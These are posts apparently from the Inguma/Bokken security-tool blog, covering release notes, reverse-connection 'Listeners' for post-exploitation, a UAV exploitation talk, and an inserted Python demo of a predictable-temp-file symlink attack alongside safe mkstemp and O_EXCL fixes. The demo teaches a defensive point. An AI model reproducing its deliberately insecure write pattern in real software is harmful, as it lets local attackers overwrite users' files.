I have just published the radare2 0.9.6 packages for Debian in the Inguma Debian repository (<a href="http://deb.inguma.eu/">http://deb.inguma.eu</a>). They are on their way to the official archives, but due to several new packages, it will take them a while to reach unstable as they have to go through the FTPmasters' manual approval.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have been using radare2 0.9 as the base API in Bokken (it was the latest packaged) for the past two years, and this new release breaks the internal r2 API in several ways, so Bokken is not able to load a single binary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Over the course of the next few days I will be adapting the code to talk to radare again and to force specific versions of the API to make sure this is a less likely event.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
See you in mercurial!</div>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-27181429976146457762012-04-20T11:46:00.000+02:002012-04-20T11:46:17.401+02:00Moving towards Inguma 0.5<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It's been quite a long time since our last update so let me show you what has been going on these last weeks.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
<span style="font-size: large;">
Inguma 0.5</span></h4>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the <a href="http://ingumadev.blogspot.com.es/2012/01/bokken-16-is-more-stable-and-easier-to.html" target="_blank">last Bokken release</a> we have focused on Inguma 0.5 development and now I'm going to show you some of the new features we have been working on.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We've done some <b>GUI improvements</b> in order to make it simpler, cleaner and to integrate the last Bokken release:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKSkmdlS_XIfKZLDsocly-x1BI9LJfS8mM9OS2RSruhvHYhPa-ebJ-NNPV0C-Ix1SgBCYAinvmv66sibFGzGXzP5d5IVoCWxEejMtNWEx7kfUK2U3ZShcjWQwgnrywBncbyT5usrROz5BZ/s1600/Inguma-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKSkmdlS_XIfKZLDsocly-x1BI9LJfS8mM9OS2RSruhvHYhPa-ebJ-NNPV0C-Ix1SgBCYAinvmv66sibFGzGXzP5d5IVoCWxEejMtNWEx7kfUK2U3ZShcjWQwgnrywBncbyT5usrROz5BZ/s320/Inguma-main.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Look at the <b>new main button</b> that integrates all the common tasks and the simplified toolbar. Also the <b>right panel</b> has been improved by adding expand/collapse buttons as well as filter buttons by Target OS.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwBsVEvg5q0EFgd-UJebYLUl2hQ4I_TX9VdadRMSzeiYPkFKFmU2iUrIbynW3ym51uTxjlzivxTIDPLY9p88Dtwtk-gf0Sv367XQuYcLZ5fRfPd3FwQt2ky3NQ4RNgDOksS5RFU0XY3PX/s1600/Inguma-right_panel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwBsVEvg5q0EFgd-UJebYLUl2hQ4I_TX9VdadRMSzeiYPkFKFmU2iUrIbynW3ym51uTxjlzivxTIDPLY9p88Dtwtk-gf0Sv367XQuYcLZ5fRfPd3FwQt2ky3NQ4RNgDOksS5RFU0XY3PX/s320/Inguma-right_panel.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
The <b>Vulnerabilities</b> panel has gained in eye candyness and functionality with the expand/collapse buttons or the "Open with Bokken" menu option.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguYP27Hnz9t04htL37eitc4TdxvHBd8UU9luqfq0evh4pvYlN3TX1zYqA-GHsKi38pRcgH5UNeD7eLsLrxrjfJidPlXDRE-hjc2REAFU3JS1r9gMx4zLhkl2-CIZYET3dXbqGRwUZ51zy9/s1600/Inguma-WebVulns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguYP27Hnz9t04htL37eitc4TdxvHBd8UU9luqfq0evh4pvYlN3TX1zYqA-GHsKi38pRcgH5UNeD7eLsLrxrjfJidPlXDRE-hjc2REAFU3JS1r9gMx4zLhkl2-CIZYET3dXbqGRwUZ51zy9/s320/Inguma-WebVulns.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Most of the work for this release has been focused on the <b>Terminals tab,</b> which has been redesigned and greatly improved.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqVbVhR2OWLbQ5PrvnleVScJwFwjY0vzJ-lG-jQBJHipfRf7_dM_23TS7V9TNi8mI0gL-Wf1pdy-zzu33EYhbsAZ2Uxc_xkAN90pxSHsUktLiOSQHmd_JSy3Ly3PDU7Czten8YgKLXaY1/s1600/Inguma-Terminals.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqVbVhR2OWLbQ5PrvnleVScJwFwjY0vzJ-lG-jQBJHipfRf7_dM_23TS7V9TNi8mI0gL-Wf1pdy-zzu33EYhbsAZ2Uxc_xkAN90pxSHsUktLiOSQHmd_JSy3Ly3PDU7Czten8YgKLXaY1/s320/Inguma-Terminals.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
As you can see, it now features many buttons to manage terminals and their contents as well as a <b>filesystem panel</b> that integrates perfectly with terminals and the rest of the GUI. From here you can import and load host lists, nmap scans, Inguma modules... and more.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Finally, the new feature that joins all the new changes is what we have called <b>Listeners</b>. By creating listeners you can now connect with your compromised targets and go ahead with post-exploitation. :) Let's see how it works.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to listen for reverse connections, or directly connect to an exploited target, simply create a local or remote listener on the toolbar popup.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXcsySnx69UdOXhYMYbrkOFBnAAYY-qM3InPE_FYKCGs0MI6SjG9oCZj7ybtogPA8VDkPQvCbmXyBXbhMOGHdaViE29lysmbGGqa0E4fM0tYQQzc907OBeg3cuy_Gq3yg8VW0iCcnQrLpy/s1600/Inguma-Listsners.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXcsySnx69UdOXhYMYbrkOFBnAAYY-qM3InPE_FYKCGs0MI6SjG9oCZj7ybtogPA8VDkPQvCbmXyBXbhMOGHdaViE29lysmbGGqa0E4fM0tYQQzc907OBeg3cuy_Gq3yg8VW0iCcnQrLpy/s320/Inguma-Listsners.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
You will see the newly created listener in the right panel, under the <b>Listeners tab</b>, as well as its status: connected or listening. From here you can disconnect or destroy them using the menu.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Once you have a connection with a compromised target you will be able to interact with it on the Terminals tab, but this is still WIP :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Of course<b> Bokken has been updated</b> to the latest release on the Reversing tab.</div>
<div style="text-align: justify;">
<br /></div>
<h4>
<span style="font-size: large;">
RootedCon 2012</span></h4>
<br />
<div style="text-align: justify;">
On March 1st, 2nd and 3rd the <a href="http://www.rootedcon.es/" target="_blank">RootedCon</a> security event was held in Madrid and one of our developers, <a href="http://twitter.com/hteso" target="_blank">Hugo Teso</a>, was there to talk about Inguma, Bokken and how to use it in security research.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The talk, entitled <a href="http://www.rootedcon.es/index.php/ponencias/#inguma" target="_blank">Inguma 0.5 RedWagon</a>, demonstrated the ability of Inguma and Bokken to study the security of an uncommon system, in this case <a href="http://en.wikipedia.org/wiki/Unmanned_aerial_vehicle" target="_blank">Unmanned Aerial Vehicles (UAS)</a>, both amateur and commercial ones. For this purpose a special edition of Inguma was coded, featuring <b>UAV Command and Control</b> software, with more protocols added to the network fuzzers among others.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The UAV C&C is an integrated <a href="http://www.waspuav.org/" target="_blank">WASP Ground Control Station</a>, modified to be able to handle different UAV Autopilots (AP), from configuration and compilation to run and control:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGNEVkPYYZcJV2sCh0s9If0agIxSGP6zTNS5XsiK2GS7tC1sd7n6Ssy21nQXxBvimlTuwiGKcBSkNHJKi9D1G38LlhJwJFGnahN1hXMGfRL3MFLrWPUWl46JI1erdP3_mCl855odt9Krhk/s1600/Inguma-RedWagon-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGNEVkPYYZcJV2sCh0s9If0agIxSGP6zTNS5XsiK2GS7tC1sd7n6Ssy21nQXxBvimlTuwiGKcBSkNHJKi9D1G38LlhJwJFGnahN1hXMGfRL3MFLrWPUWl46JI1erdP3_mCl855odt9Krhk/s320/Inguma-RedWagon-main.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Within the<b> C&C tab</b> many APs can be configured and run, either in SITL or HITL, such as ArduPilot Mega, Paparazzi or WASP. After using the Fuzzers to find vulnerabilities, either the Networking or the C&C tabs can be used to <b>exploit a vulnerable UAV</b>, depending on whether the vulnerability affects the GCS or the UAV directly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to reverse-engineer the vulnerable AutoPilot or Ground Control Station, Bokken with the <a href="http://radare.org/y/" target="_blank">Radare2</a> core was used, so the whole process of vulnerability finding, development and exploiting has been done with <a href="http://inguma.eu/projects/inguma" target="_blank">Inguma</a> and <a href="http://inguma.eu/projects/bokken/" target="_blank">Bokken</a> :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0N7wPI-ksCxdt_zUlhyj4fVJs-h8SBStxH2Eqz2-YUd5Ln3k6itB81SY7cbc4lIbxC4A-CJ84QS3iafmWFwlT8MeIW_slyyj4tEvuKxIi5q9_DBboVBKNpkRoL5cwwmpD_Evt_4Wpr6aO/s1600/Bokken-AP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0N7wPI-ksCxdt_zUlhyj4fVJs-h8SBStxH2Eqz2-YUd5Ln3k6itB81SY7cbc4lIbxC4A-CJ84QS3iafmWFwlT8MeIW_slyyj4tEvuKxIi5q9_DBboVBKNpkRoL5cwwmpD_Evt_4Wpr6aO/s320/Bokken-AP.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
<a href="http://www.flickr.com/photos/_rooted/7063441847/in/photostream/" target="_blank">Here</a> you can see some photos of the talk and some <a href="http://www.slideshare.net/rootedcon/tag/rooted2012" target="_blank">slides</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As you can see, the lack of news doesn't mean lack of activity as we have been really busy :) Stay <a href="https://twitter.com/ingumito" target="_blank">tuned</a> for more updates and upcoming releases!</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com7tag:blogger.com,1999:blog-8320914018667085850.post-24163652907318455142012-01-24T07:50:00.000+01:002012-01-24T07:50:20.753+01:00Bokken 1.6 is more stable and easier to installA month and a half after having <a href="http://ingumadev.blogspot.com/2011/12/and-finally-bokken-15.html">released Bokken 1.5</a>, the Inguma/Bokken team is proud to present a point release to our baby Bokken. The download page can be found <a href="http://inguma.eu/projects/bokken/files" target="_blank">here</a>!<br />
<br />
The main changes in 1.6 are:<br />
<br />
<ul>
<li>Fixed a security bug due to a predictable temporary file creation (a Debian developer reported it the very first day in the archive, yay!).</li>
<li>Fixed some obvious usability issues and crashes when opening new files inside Bokken.</li>
<li>Now Bokken is better prepared to use a system-wide pyew, for example, or to be installed somewhere other than your home directory (like distributed as a Debian package :-) ). Some of the images and icons were not working previously.</li>
<li>In the meantime, we <a href="http://inguma.eu/issues/91" target="_blank">started to import Bokken 1.5 into Inguma</a> and quickly realized that: a) some of the UI changes scheduled for next Inguma release could fit into Bokken (read here <i>eating up the top toolbar and menubar</i>), and b) a lot of the migration work could be simplified if we use a simpler frame to embed Bokken in (and thus into Inguma in the long run).</li>
</ul>
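<div>
The bug class behind the first fix in the list above, shown as an added example (this is not Bokken's code or its actual patch): a predictable temporary file name beside two safe ways of creating the file. The file names, the PID value and the <i>demo</i> helper are constructed for illustration, and the "shared" directory is a private scratch directory so the script is harmless to run.</div>

```python
import os
import stat
import tempfile


def predictable_name(tmpdir, pid):
    # Weak pattern: the name is derived from guessable values (a fixed prefix
    # and the PID), so any local user can create it first in a shared /tmp.
    return os.path.join(tmpdir, "app_%d.tmp" % pid)


def write_insecure(path, data):
    # open(..., "w") follows symlinks and truncates whatever it lands on.
    with open(path, "w") as fh:
        fh.write(data)


def write_exclusive(path, data):
    # O_CREAT|O_EXCL fails if the name already exists, symlinks included,
    # and the file is created owner-only (0600) from the start.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)


def write_mkstemp(tmpdir, data):
    # Preferred: mkstemp picks a random name and opens it with O_EXCL, 0600.
    fd, path = tempfile.mkstemp(prefix="app_", suffix=".tmp", dir=tmpdir)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demo():
    """Run the three variants against a pre-existing symlink (constructed)."""
    results = {}
    with tempfile.TemporaryDirectory() as shared:
        # A file the application's user can write to but never meant to touch.
        victim = os.path.join(shared, "victim.cfg")
        with open(victim, "w") as fh:
            fh.write("original")

        # Constructed precondition: the guessable name already exists as a
        # symlink to the victim file before the application creates it.
        guess = predictable_name(shared, 4242)
        os.symlink(victim, guess)

        # 1. The weak pattern writes through the link and clobbers the victim.
        write_insecure(guess, "scratch")
        with open(victim) as fh:
            results["victim_after_insecure"] = fh.read()

        # Restore the victim, then try the exclusive create on the same name.
        with open(victim, "w") as fh:
            fh.write("original")
        try:
            write_exclusive(guess, "scratch")
            results["exclusive_refused"] = False
        except OSError:
            # Creation is refused because the name is already taken.
            results["exclusive_refused"] = True
        with open(victim) as fh:
            results["victim_after_exclusive"] = fh.read()

        # 2. mkstemp never reuses the guessable name and is owner-only.
        path = write_mkstemp(shared, "scratch")
        results["mkstemp_mode"] = stat.S_IMODE(os.stat(path).st_mode)
        results["mkstemp_is_guess"] = (path == guess)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```
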
<div>
<br /></div>
<div>
This means that when you use Bokken 1.6 you may notice a somewhat unusual menu bar:<br />
<br /></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jDOdMyEIZDwYSt-_7PBzoTOOqUXKLy7dF-7EudxqtqAuvxuqiXTfLmNozztYBck1p_TE6CNbyfvZlYHz9YlsGLqdYS9rDOPCVbNowa3zibfLj-swtzooCWuUI7UEhMOw1em4jmUFdfE0/s1600/Screen+Shot+2012-01-18+at+12.10.07+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="441" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jDOdMyEIZDwYSt-_7PBzoTOOqUXKLy7dF-7EudxqtqAuvxuqiXTfLmNozztYBck1p_TE6CNbyfvZlYHz9YlsGLqdYS9rDOPCVbNowa3zibfLj-swtzooCWuUI7UEhMOw1em4jmUFdfE0/s640/Screen+Shot+2012-01-18+at+12.10.07+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bokken 1.6 running on Windows 7</td></tr>
</tbody></table>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
Inspired by <a href="http://mypaint.intilinux.com/" target="_blank">MyPaint</a>, we got rid of menu bars (no more File/Edit/... menus) and together with some other buttons in the top toolbar, we replaced them with a big button that comprises most of the previous functionality:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjofX2KffqD71kPVL0fzG2Eurv5lGCo3uh4awhGv05RWBLATZsbY3m5BoBVwLhkARGqyFGusI-ZxEGQrazFR1fcftHjlZscoQ2Vi4UrSCnKPuQ9wGO8b-SXwGaWiqEYIRe7OOKhuRYxFRM8/s1600/Screen+Shot+2012-01-15+at+11.43.27+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjofX2KffqD71kPVL0fzG2Eurv5lGCo3uh4awhGv05RWBLATZsbY3m5BoBVwLhkARGqyFGusI-ZxEGQrazFR1fcftHjlZscoQ2Vi4UrSCnKPuQ9wGO8b-SXwGaWiqEYIRe7OOKhuRYxFRM8/s1600/Screen+Shot+2012-01-15+at+11.43.27+AM.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Close capture of the new toolbar in Bokken 1.6<br />
running on Debian Linux wheezy</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
On another note, we have been releasing <b>.deb</b> packages since the 1.5 release, together with the rest of dependencies (python-radare2, pyew, etc.), and they have reached the official Debian archive (<a href="http://packages.debian.org/bokken">http://packages.debian.org/bokken</a>). Today we are also proud to present a signed APT repository that you can easily add to your <i>/etc/apt/sources.list</i> in your favorite Debian/Ubuntu/Debian-compatible distribution to follow our development more closely:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;">deb http://deb.inguma.eu/ stable main</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
For more information and instructions for retrieving the repository signing key, please see the new <a href="http://inguma.eu/projects/bokken/wiki/Debian_installation" target="_blank">installation in Debian and derivatives</a> wiki page.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Enjoy it! And remember: please report to the team any bugs you may find, through <a href="http://inguma.eu/projects/bokken/issues" target="_blank">Redmine</a>, our ticketing system.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-28103372414846151342012-01-23T05:22:00.002+01:002012-01-23T05:22:50.067+01:00Inguma T-Shirts, and updated Inguma server<div style="text-align: justify;">
The Three Wise Men came for Christmas with some presents:<br />
<br />
<ul>
<li>We partnered with a Spanish site to sell Inguma T-shirts.</li>
<li> Our server has doubled its physical memory! Yay!</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.camisetasfrikis.es/shop/79-598-large/camiseta-inguma.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.camisetasfrikis.es/shop/79-598-large/camiseta-inguma.jpg" /></a></div>
<br />
<br />
The shirts are available through the <a href="http://www.camisetasfrikis.es/shop/79-camiseta-inguma.html">Camisetas Frikis</a> site (as far as we know, only in Spanish for the moment), and with every purchase, you will be contributing 3 € to the project (see below!). If you want to order any and Google Translate is not up to the job, the best thing you can do is to write to info(AT)camisetasfrikis.es with your order or any questions. Their staff will reply to you promptly!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With the yearly server renewal we decided to scratch our pockets and spend more money on memory. The web server has been fighting for resources during the last months with the rest of the processes on the box. Now there are cookies for everyone. :-) Maybe with the T-shirts we will be able to subsidize some of our expenses, which come exclusively from our pockets.<br />
<br />
Thanks for your time and stay tuned for the upcoming release of Bokken 1.6!</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-32547344324849797952011-12-07T10:55:00.000+01:002011-12-07T21:57:25.394+01:00And finally... Bokken 1.5<div class="separator" style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhns3f3rPGt4PiMAHyA8n-OJBDejsLyQauGPZCl_FjvJth9DlYsmpHOjb1bv6eEhLZ10B1lrY6BHltHF-qZ0uEFdx24B6PzRdG5MRMKsOqDY5NRzB97AAUlYtsz4Zu9jqLKXLVd_eK94RuX/s1600/logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhns3f3rPGt4PiMAHyA8n-OJBDejsLyQauGPZCl_FjvJth9DlYsmpHOjb1bv6eEhLZ10B1lrY6BHltHF-qZ0uEFdx24B6PzRdG5MRMKsOqDY5NRzB97AAUlYtsz4Zu9jqLKXLVd_eK94RuX/s200/logo.png" width="200" /></a></div>
Once the development has finished, <a href="http://radare.org/get/changelog2-0.9-short">radare2 0.9</a> has been released and the <a href="http://bokken.inguma.eu/">project site</a> has been updated, the moment has arrived: <b>Bokken 1.5 is here!</b><br />
<br />
Take a look at the <a href="http://ingumadev.blogspot.com/2011/10/new-release-is-coming.html">previous post</a> to read some of the new features of this release and keep reading to see most of them in detail; for the rest... install Bokken and enjoy them!<br />
<div>
<br /></div>
<div>
As mentioned before, one of the most important features added is the support of radare2 as backend. So now Bokken can work with either <b><a href="http://code.google.com/p/pyew/">Pyew</a> or <a href="http://radare.org/">Radare</a></b>, each one having its own advantages and drawbacks.</div>
<div>
<br /></div>
<div>
Most of the development efforts for this release have gone to <b>improve the GUI</b> in order to make it cleaner and easier to use.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZchP75JWqMQ0BZKQtu-Uw-K5ODDuqjrMhV_jncQQjB3c_8iL8eHGOlssh7tjAFFPc7OOZXr-HxTb7ZQdBuWKdwXyVg0roWG03Lx0roG_cRRI7VcIG32ye9Y_KKbEB2-QtVwNHtuwYohaJ/s1600/bokken-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZchP75JWqMQ0BZKQtu-Uw-K5ODDuqjrMhV_jncQQjB3c_8iL8eHGOlssh7tjAFFPc7OOZXr-HxTb7ZQdBuWKdwXyVg0roWG03Lx0roG_cRRI7VcIG32ye9Y_KKbEB2-QtVwNHtuwYohaJ/s400/bokken-main.png" width="400" /></a></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
The <b>disassembly view</b> has gained in interactivity, and now it features, among others:</div>
<div>
<ul>
<li><b>Code navigation</b> by clicking over: functions, basic blocks, address, section names, etc...</li>
<li>Add <b>comments</b>, view and follow <b>xrefs</b> or view <b>opcode information</b> by right-clicking on a code line.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAcc7T_xBduU3ufjOLRoDMILStWY82hXiaXDIo5pbZkxgSGJqhGZLpzsSp2bqtGHhnEfIbucE5m1R_QLSE0w5NCkaGQ5_xGaDoFVXda3wTk17qbp2Uox6qhvLHRZz4SbA4OKp0e1uZZde/s1600/bokken-dasm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAcc7T_xBduU3ufjOLRoDMILStWY82hXiaXDIo5pbZkxgSGJqhGZLpzsSp2bqtGHhnEfIbucE5m1R_QLSE0w5NCkaGQ5_xGaDoFVXda3wTk17qbp2Uox6qhvLHRZz4SbA4OKp0e1uZZde/s400/bokken-dasm.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
The <b>graph tab</b> has been improved, mainly when the radare backend is used; if so, the graph will show a <b>flowgraph</b> or <b>callgraph </b>and pop up a <b>xrefs menu</b> if a node is right-clicked.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2gaCpkBHjz9QjrQhKAA_xbTLSUeHH3GmIAJHHyYDyRigLrLID39GAYDtjQNPQHWudJA3nUku4pAV8cmKmI6w_PeXA243g_Ocm2lT1sSKSpfjDI8sNbhyMWAd4QRc6itSMrNKZnf25K6s5/s1600/bokken-flowgraph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2gaCpkBHjz9QjrQhKAA_xbTLSUeHH3GmIAJHHyYDyRigLrLID39GAYDtjQNPQHWudJA3nUku4pAV8cmKmI6w_PeXA243g_Ocm2lT1sSKSpfjDI8sNbhyMWAd4QRc6itSMrNKZnf25K6s5/s400/bokken-flowgraph.png" width="400" /></a></div>
<br /></div>
<div>
Even the <b>hexdump</b> has received some love and now has <b>syntax highlighting</b> and selected bytes will be <b>disassembled</b>.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhloN0l_4GhQwPoPVadYma8yt_JCKOasYR0ArAHRhXrswEpBvHSehteCpH8ASz-s64cuTrZ5AvfZGuji5Qg1_yBBLU67sDz8Z2sH4u9sGaN3JVorzL3rYWQFUh0RJQcYCDrZTJgyUR5hKns/s1600/bokken-hexdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhloN0l_4GhQwPoPVadYma8yt_JCKOasYR0ArAHRhXrswEpBvHSehteCpH8ASz-s64cuTrZ5AvfZGuji5Qg1_yBBLU67sDz8Z2sH4u9sGaN3JVorzL3rYWQFUh0RJQcYCDrZTJgyUR5hKns/s400/bokken-hexdump.png" width="400" /></a></div>
<br /></div>
<div>
If the radare backend is used, a new tab will be added with <b>extended target information</b> like entry points, symbols, imports, sections and strings.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB6NQ4JGDQqzW05GC6sUBMQRheZsgsETkREEBMjTeiUYPfVB1mubeP0VUHhh8WoUSsY4nJUcUdS4hoD-bYKhyphenhyphen-ISlTTVpHkwYXowOiIWWHCxjxwYoEf6aVgsDI95pAiA5KyjhhMvb1PVRg/s1600/bokken-fileinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB6NQ4JGDQqzW05GC6sUBMQRheZsgsETkREEBMjTeiUYPfVB1mubeP0VUHhh8WoUSsY4nJUcUdS4hoD-bYKhyphenhyphen-ISlTTVpHkwYXowOiIWWHCxjxwYoEf6aVgsDI95pAiA5KyjhhMvb1PVRg/s400/bokken-fileinfo.png" width="400" /></a></div>
<br /></div>
<div>
Do you want to use Bokken to find the exploit of the latest patched vulnerability from your favorite vendor? Congrats! Bokken 1.5 features for the first time a <b>binary diffing</b> plugin that can be used with radare.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhru7ccvmErFtjhHD6zvEf3zrS_66b-W_k4gi8c3ECOirRHMA-hyz78qK3FvZgPW9EYrD2QuhaGoLsaBKQVw-9_ARHSmuYuks8bbYhuyo8RkAOhZPlqOpdfVgEsiWmGcl3HXV3jVCQGAA5o/s1600/bokken-bindiff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhru7ccvmErFtjhHD6zvEf3zrS_66b-W_k4gi8c3ECOirRHMA-hyz78qK3FvZgPW9EYrD2QuhaGoLsaBKQVw-9_ARHSmuYuks8bbYhuyo8RkAOhZPlqOpdfVgEsiWmGcl3HXV3jVCQGAA5o/s400/bokken-bindiff.png" width="400" /></a></div>
<br /></div>
<div>
Other plugins added are:</div>
<div>
<ul>
